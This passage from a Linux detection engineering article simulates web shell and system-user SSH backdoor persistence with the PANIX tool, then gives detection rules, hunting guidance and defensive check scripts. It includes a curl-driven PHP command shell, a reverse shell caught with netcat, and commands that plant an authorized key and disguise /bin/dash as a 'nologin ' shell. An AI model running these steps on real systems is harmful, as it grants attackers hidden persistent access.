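print(looks_like_cmd_shell(PHP_SAMPLE), looks_like_cmd_shell(PY_SAMPLE))
```

A check like this is most useful as a triage aid when reviewing files that were recently created or modified in a web root.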

Attackers often target web root directories like /var/www/html/ to upload their web shells. Weak file upload restrictions or misconfigured permissions allow them to place malicious scripts. To enhance persistence, attackers may:

Embed Web Shells in Existing Files: Modify legitimate files to include web shell code, making detection more challenging.
Use Built-in Web Servers: Start a web server in a specific directory to bypass restrictions.
Leverage Hidden Directories: Place web shells in obscure or hidden directories to avoid detection.

Although this type of implementation is also possible in languages other than PHP and Python, those languages commonly require additional modules or plugins to be installed, making them a less viable option. The following section will explore detailed examples of these methods and their corresponding detection strategies.

Persistence through T1505.003 - Web Shell: PHP & Python

Let’s examine how PANIX leverages PHP, Python, and CGI to establish web shell backdoors within the setup_web_shell.sh module. Refer to the module to inspect the full payloads.

Depending on permissions, PANIX creates a web server in /var/www/html/ (root) or $HOME/ (non-root). PHP uses the -S flag to start a lightweight server, with -t specifying the root directory to serve the web shells. For Python, the -m http.server module is combined with --cgi to enable dynamic execution of CGI scripts. If only Python 2 is available, PANIX falls back to -m CGIHTTPServer for compatibility.

Servers are launched in the background using nohup to ensure persistence, remaining active even after the user logs out.
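The flags described above make these built-in servers fairly easy to recognize in process command lines. The following Python sketch classifies a command line based on those flags alone; the is_builtin_web_server helper is a hypothetical name, and the exact command lines PANIX produces are not reproduced here, so the sample strings are assumptions.

```python
import shlex

PYTHON_SERVER_MODULES = ("http.server", "CGIHTTPServer")


def is_builtin_web_server(command_line):
    """Return True for PHP (-S) or Python (-m http.server / CGIHTTPServer) servers."""
    argv = shlex.split(command_line)
    if not argv:
        return False
    binary = argv[0].rsplit("/", 1)[-1]  # strip any leading directory
    args = argv[1:]
    if binary.startswith("php"):
        return "-S" in args
    if binary.startswith("python"):
        # Look for "-m <module>" pairs anywhere in the argument list.
        for flag, module in zip(args, args[1:]):
            if flag == "-m" and module in PYTHON_SERVER_MODULES:
                return True
    return False


# Assumed example command lines for illustration.
for sample in (
    "php -S 0.0.0.0:8080 -t /home/ruben/panix/",
    "python3 -m http.server --cgi 8080",
    "python3 script.py",
):
    print(sample, "->", is_builtin_web_server(sample))
```

On a production server, a match is more interesting when the parent process is an interactive shell or nohup rather than a service manager.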

Let’s look at what traces we can detect within these chains, starting with a PHP CMD shell. To simulate this activity, we can use the following PANIX command:

> ./panix.sh --web-shell --language php --mechanism cmd --port 8080

[+] Web server directory created at /home/ruben/panix/
[+] cmd.php file created in /home/ruben/panix/
[+] Interact via: curl http://<ip>:8080/cmd.php?cmd=whoami
[!] Starting PHP server on port 8080...
[+] PHP server running in the background at port 8080.
[!] In case you cannot connect, ensure your firewall settings are allowing inbound traffic on port 8080.

Run the following commands in case of issues on RHEL/CentOS systems:

sudo firewall-cmd --add-port=8080/tcp --permanent
sudo firewall-cmd --reload

After execution, we can call the cmd.php through the following curl command:

> curl http://192.168.1.100:8080/cmd.php?cmd=whoami
ruben

Executing the payload generates the following documents in Kibana:

The figure above shows PANIX being executed and the /home/ruben/panix/ directory being created (as PANIX is executed with user privileges). The cmd.php file is created, and the PHP web shell is spawned with the -S flag and listens on all interfaces (0.0.0.0) on port 8080. Upon execution of the curl command from the attack host, we can see a connection_accepted, followed by the execution of the whoami command, followed by a disconnect_received.

To simulate reverse shell behavior, we can set up a Python reverse shell through the following PANIX command:

> ./panix.sh --web-shell --language python --mechanism reverse --port 8080 --rev-port 2018 --ip 192.168.1.100

[+] Web server directory created at /home/ruben/panix/
[+] reverse.py file created in /home/ruben/panix/cgi-bin/
[+] Interact via: curl http://<ip>:8080/cgi-bin/reverse.py
[!] Starting Python3 server on port 8080 with CGI enabled...
[+] Python3 server running in the background at port 8080.
[!] In case you cannot connect, ensure your firewall settings are allowing inbound traffic on port 8080.

Run the following commands in case of issues on RHEL/CentOS systems:

sudo firewall-cmd --add-port=8080/tcp --permanent
sudo firewall-cmd --reload

Afterwards, we can interact with the reverse shell from the attacker machine. The listener in the second terminal must be running before the web shell is triggered from the first:

# Terminal 1
> curl http://192.168.1.100:8080/cgi-bin/reverse.py

# Terminal 2
> nc -nvlp 2018
listening on [any] 2018 ...
connect to [192.168.211.131] from (UNKNOWN) [192.168.211.151] 47250
> whoami
ruben

This module generates the following documents:

After PANIX executes, we can see /home/ruben/panix/cgi-bin/reverse.py being created and execution permissions being granted. A python3 web server with CGI support is spawned. After executing the curl command from the attacker machine, we can see an incoming connection through the connection_accepted event, followed by the execution of the reverse shell command, leading to the call back to the attacker machine through the connection_attempted event. A fully interactive shell is obtained once the attacker catches the reverse connection.

You can revert the changes made by PANIX by running the following revert command:

> ./panix.sh --revert web-shell

###### [+] Reverting web-shell module... #####

[+] Running as non-root. Reverting web shell for user 'ruben'.
[+] Reverting web shell for user 'ruben' at: /home/ruben/panix/
[+] Identifying web server processes serving /home/ruben/panix/...
[+] Killed process 11592 serving /home/ruben/panix/.
[+] Removed web server directory: /home/ruben/panix/

After this, all artifacts should be removed.

Let’s take a look at the coverage:

Category	Coverage
File	Suspicious File Creation via Web Server
Process	File Downloaded from Suspicious Source by Web Server
	File Downloaded and Piped to Interpreter by Web Server
	Suspicious Download and Redirect by Web Server
	Web Server Spawned via Python
	Simple HTTP Web Server Creation
	Potential Remote Code Execution via Web Server
	File Downloaded to Suspicious Location by Web Server
	Decode Activity via Web Server
	Unusual Command Executed by Web Server
Network	Reverse Shell Executed via Web Server
	Simple HTTP Web Server Connection
Detection and endpoint rules that cover web shell persistence

Hunting for T1505.003 - Web Shell

We can hunt for this technique using ES|QL and OSQuery by focusing on suspicious file creation events and anomalous network activity commonly associated with web shells. The approach includes monitoring for the following:

Creation or renaming of web shell files: Tracks files with extensions such as .php, .py, .pl, .rb, .lua, and .jsp in unexpected or uncommon locations, which may indicate the deployment of a web shell.
Anomalous network activity by scripting engines: Observes disconnect events and unusual connections initiated by processes like python, php, or perl, particularly connections to external IP addresses.
Low-frequency external connections: Detects rare or low-volume network connections from processes, especially those initiated by root or unique agents, which can indicate malicious web shell activity.

By combining the Persistence via Web Shell, Persistence Through Reverse/Bind Shells, and Low Volume External Network Connections from Process by Unique Agent hunting rules with the tailored detection queries listed above, analysts can effectively detect and respond to T1505.003.
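
As a local complement to the file-creation hunt described above, the following is a minimal sketch (not one of the referenced hunting rules) that lists files with the script extensions mentioned earlier under a given directory. The function name find_script_files is hypothetical, and which directories count as "unexpected" is left to the analyst.

```shell
# Hypothetical helper (not part of PANIX or the hunting rules): list regular
# files under a directory whose extension matches the script types named
# above (.php, .py, .pl, .rb, .lua, .jsp).
# Usage: find_script_files <directory>
find_script_files() {
    find "$1" -type f \( \
        -name '*.php' -o -name '*.py'  -o -name '*.pl' -o \
        -name '*.rb'  -o -name '*.lua' -o -name '*.jsp' \
    \) 2>/dev/null | sort
}
```

Running find_script_files against a user's home directory, for example, would surface files such as the cgi-bin/reverse.py script created by the module above. Extension matching alone is noisy, so the output is best treated as a starting point for triage rather than a verdict.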

T1098.004 - Account Manipulation: SSH Authorized Keys

SSH's authorized_keys feature is a common target for attackers aiming to establish persistent access to compromised Linux systems. By placing their public keys in the authorized_keys file, attackers can gain access without requiring further authentication if the private key is in their possession. This mechanism is controlled by files like .ssh/authorized_keys or .ssh/authorized_keys2, typically in the user’s home directory. While this persistence method is well-documented, we explored its nuances in detail in a previous article.

In this section, we will focus on a less conventional but intriguing variation of this technique: abusing system accounts that are rarely used and retain their default configurations. This approach leverages the default home directories of these users to create .ssh directories and insert authorized_keys files, enabling SSH-based persistence under these accounts. Exatrack’s research on a new variant of the perfctl malware recently explored this technique. Although MITRE does not track this specific variation of the authorized keys persistence technique, the overall technique is tracked under T1098.004.

T1098.004 - SSH Authorized Keys: System User Backdoors

System accounts like news or nobody often exist on default Linux installations with non-interactive shells (e.g., /usr/sbin/nologin) and predefined home directories. These accounts, typically overlooked and not intended for direct login, can become attractive targets for attackers. We can observe their configurations in the /etc/passwd file:

> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

As we can see, the root user's home directory is /root/, while system users like news, backup, and nobody also have default home directories, such as /var/spool/news/ and /nonexistent/. The default shell for root is /bin/bash, whereas system users are restricted by /usr/sbin/nologin.

Although system users are intended to be non-interactive, attackers can exploit their configurations by creating .ssh directories in their home directories and adding authorized_keys files for SSH-based authentication. By manipulating the /etc/passwd file and shell configuration, attackers can bypass restrictions imposed by /usr/sbin/nologin and gain access. The next section will explore this technique in detail, including the steps attackers use to execute it.
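
To get a quick overview of which accounts fit this profile on a given host, the sketch below prints every account whose shell path ends in nologin, together with its home directory. The function name list_nologin_accounts is hypothetical; it reads a passwd-format file and defaults to /etc/passwd.

```shell
# Hypothetical helper: print "user<TAB>home" for every account in a
# passwd-format file whose login shell path ends in "nologin".
# Usage: list_nologin_accounts [passwd_file]
list_nologin_accounts() {
    awk -F: '$7 ~ /\/nologin$/ { printf "%s\t%s\n", $1, $6 }' "${1:-/etc/passwd}"
}
```

Against the /etc/passwd excerpt shown above, this would list mail, news, backup, and nobody with their respective home directories, which are the candidate locations for a planted .ssh directory.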

Persistence through T1098.004 - SSH Authorized Keys: Backdoored System Users

Let’s examine how the PANIX setup_backdoor_system_user.sh module abuses this trick to leverage non-interactive system accounts to gain SSH access onto a target without creating a new user. Refer to the module to inspect the full payloads.

The first step is to identify a system user as the target for the attack. For example, as we know:

The news user has /var/spool/news/ as its home directory.
The nobody user has /nonexistent/ by default (which can be created).

The next step is to create the .ssh directory within the home directory, write the attacker’s public key to the authorized_keys file, and set the correct file permissions:

# Create the .ssh directory
mkdir -p "$home_dir/.ssh"
chmod 755 "$home_dir/.ssh"  # Set directory permissions to be accessible by others

# Write the public key to authorized_keys
echo "$key" > "$home_dir/.ssh/authorized_keys"
chmod 644 "$home_dir/.ssh/authorized_keys"  # Set file permissions to be readable by others

This step ensures that the attacker can authenticate via SSH using their private key. The next step is to modify the shell. By default, system users like news and nobody are configured with /usr/sbin/nologin as their shell, which prevents interactive login sessions. We need to circumvent this restriction by:

Copying (for example) /bin/dash to /usr/sbin/nologin (with a trailing space).
Updating /etc/passwd to include the modified shell path.

# Copy /bin/dash to '/usr/sbin/nologin '
cp /bin/dash "/usr/sbin/nologin "

# Modify /etc/passwd to include the trailing space in the shell path
local username=$(echo "$user_entry" | cut -d: -f1)
sed -i "/^$username:/s|:/usr/sbin/nologin$|:/usr/sbin/nologin |" /etc/passwd

Here, the username variable can be set to any system user. This subtle manipulation tricks the system into treating /usr/sbin/nologin (with a trailing space), which is in fact a copy of /bin/dash, as a valid shell.
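
From a defensive angle, the sed edit above leaves a recognizable trace: a shell field in /etc/passwd that ends in whitespace. The following is a minimal sketch of a check for that trace; the function name find_padded_shells is hypothetical, and the brackets in the output exist only to make the trailing space visible.

```shell
# Hypothetical helper: report accounts whose shell field (7th passwd field)
# ends in a space or tab. Output is "user<TAB>[shell]" so the padding shows.
# Usage: find_padded_shells [passwd_file]
find_padded_shells() {
    awk -F: '$7 ~ /[ \t]+$/ { printf "%s\t[%s]\n", $1, $7 }' "${1:-/etc/passwd}"
}
```

On an unmodified system this should print nothing, so any output is worth a closer look.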

Finally, to ensure SSH accepts the modified shell as valid, we need to add nologin (with a trailing space) to /etc/shells:

# Check and add "nologin " to /etc/shells if not already present
if ! grep -q "nologin " /etc/shells; then
    echo "nologin " >> /etc/shells
    echo "[+] Added 'nologin ' to /etc/shells"
else
    echo "[+] 'nologin ' already exists in /etc/shells. Skipping."
fi

This step ensures SSH does not reject login attempts due to the manipulated shell. Now that we understand the flow, let’s run the module.

> sudo ./panix.sh --backdoor-system-user --default --key <ssh-rsa public key>

[+] Added 'nologin ' to /etc/shells
[+] Copied /bin/dash to '/usr/sbin/nologin '
[+] Modified /etc/passwd to update shell path for user: news
[+] System user backdoor persistence established for user: news

We can now log in to the system via SSH as the news user:

> ssh news@192.168.31.129
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-130-generic x86_64)

Let’s analyze this technique’s traces in Discover:

Upon PANIX execution, the /var/spool/news/.ssh/ directory and the authorized_keys file are created and granted the correct permissions (755 and 644 respectively). Next, the /usr/sbin/nologin (with trailing space) file is created, and the /etc/passwd and /etc/shells files are modified. Upon completion, the news user is able to authenticate via SSH and obtain an interactive shell.
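
The copied binary is easy to miss in a directory listing because the trailing space is invisible. As a rough sketch, the hypothetical helper below lists files whose names end in a space and wraps each path in brackets so the padding stands out.

```shell
# Hypothetical helper: list regular files under a directory whose name ends
# in a space, wrapping each path in brackets to expose the trailing space.
# Usage: find_trailing_space_names <directory>
find_trailing_space_names() {
    find "$1" -type f -name '* ' -print 2>/dev/null | sed 's/^/[/; s/$/]/'
}
```

Pointing it at /usr/sbin on the test host after running the module would be expected to reveal the '/usr/sbin/nologin ' copy.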

You can revert the changes made by PANIX by running the following revert command:

> sudo ./panix.sh --revert backdoor-system-user

###### [+] Reverting backdoor-system-user module... #####

[+] Removing .ssh directory for user: news
[+] Successfully removed .ssh directory for news.
[+] Reverting /etc/passwd entry for user: news
[+] Successfully reverted /etc/passwd entry for news.

[+] Removing '/usr/sbin/nologin '
[+] Successfully removed '/usr/sbin/nologin '.
[+] Reverting /etc/shells to remove 'nologin ' entry.
[+] Successfully removed 'nologin ' from /etc/shells.

After this, all artifacts should be removed.
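
To double-check the cleanup, or to look for the same artifact on other hosts, a small check on /etc/shells can help. The sketch below is an assumption-laden heuristic rather than an official validation: it flags entries that are not absolute paths or that end in whitespace. The function name find_odd_shell_entries is hypothetical.

```shell
# Hypothetical helper: flag /etc/shells entries that are not absolute paths
# or that end in a space or tab. Output is "line_number<TAB>[entry]".
# Usage: find_odd_shell_entries [shells_file]
find_odd_shell_entries() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }      # skip comments and blank lines
        ($0 !~ /^\//) || ($0 ~ /[ \t]$/) { printf "%d\t[%s]\n", NR, $0 }
    ' "${1:-/etc/shells}"
}
```

After a successful revert, the 'nologin ' entry should no longer be reported.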

Several detection and endpoint rules cover different parts of this technique:

Category	Coverage
IAM	Login via Unusual System User
Process	Unusual Interactive Shell Launched from System User
	Potential Nologin SSH Backdoor
	Masquerading Space After Filename
Detection and endpoint rules that cover backdoored system user persistence

Hunting for T1098.004 - SSH Authorized Keys: Backdoored System Users

We can hunt for this technique using ES|QL and OSQuery by focusing on identifying unauthorized SSH key additions, tampered system files, and unusual activity involving system users such as news or nobody. The following key areas are effective for detection:

Suspicious SSH Key Modifications: Monitors for changes to .ssh directories and authorized_keys files in unexpected locations, such as /var/spool/news/.ssh/ or /nonexistent/.ssh/.
Unusual File Changes: Identifies modifications to SSH-related files and directories, tracking ownership and access patterns.
Interactive Process Activity: Detects rare interactive sessions initiated by system accounts that typically lack login access.
System File Tampering: Flags modifications to /etc/passwd and /etc/shells, including unusual shell paths or additions of invalid entries like 'nologin ' (with a trailing space).

By leveraging the Persistence via SSH Configurations and/or Keys hunt, analysts can uncover unauthorized persistence mechanisms, investigate potential abuse of system accounts, and respond effectively to these threats.
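
For a quick host-level triage alongside the hunt, the sketch below walks a passwd-format file and reports any authorized_keys or authorized_keys2 file found under the home directory of an account whose shell contains nologin. This is a heuristic of our own, not the logic of the referenced hunt; the function name find_system_user_keys and the optional root_prefix argument (useful for mounted disk images) are hypothetical.

```shell
# Hypothetical helper: for each account whose shell contains "nologin"
# (with or without a trailing space), report SSH key files in its home.
# Output is "user<TAB>path". root_prefix is prepended to each home path.
# Usage: find_system_user_keys [passwd_file] [root_prefix]
find_system_user_keys() {
    passwd_file="${1:-/etc/passwd}"
    root_prefix="${2:-}"
    awk -F: '$7 ~ /nologin/ { print $1 ":" $6 }' "$passwd_file" |
    while IFS=: read -r user home; do
        for f in authorized_keys authorized_keys2; do
            if [ -f "$root_prefix$home/.ssh/$f" ]; then
                printf '%s\t%s\n' "$user" "$home/.ssh/$f"
            fi
        done
    done
}
```

Service accounts rarely have a legitimate reason to hold SSH keys, so each hit deserves review, keeping in mind that some environments do provision keys for such accounts on purpose.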

Conclusion

In this third chapter of the "Linux Detection Engineering" series, we explored various persistence techniques adversaries might leverage on Linux systems. Starting with dynamic linker hijacking, we demonstrated how manipulation of the dynamic linker through LD_PRELOAD can be abused for persistence. We then looked into loadable kernel modules (LKMs), a powerful feature that allows attackers to embed malicious code directly into the kernel, offering deep system control and persistence. Next, we examined web shells, which enable scripting-based persistence and remote access and pose a significant risk in web-exposed environments. Finally, we analyzed the abuse of default system users with non-interactive shells, revealing how attackers can leverage these often-overlooked accounts to establish persistence without creating new user entries.

These techniques underscore the ingenuity and variety of methods adversaries can employ to persist on Linux systems. You can build robust defenses and fine-tune your detection strategies by leveraging PANIX to simulate these attacks and using the tailored ES|QL and OSQuery detection queries provided.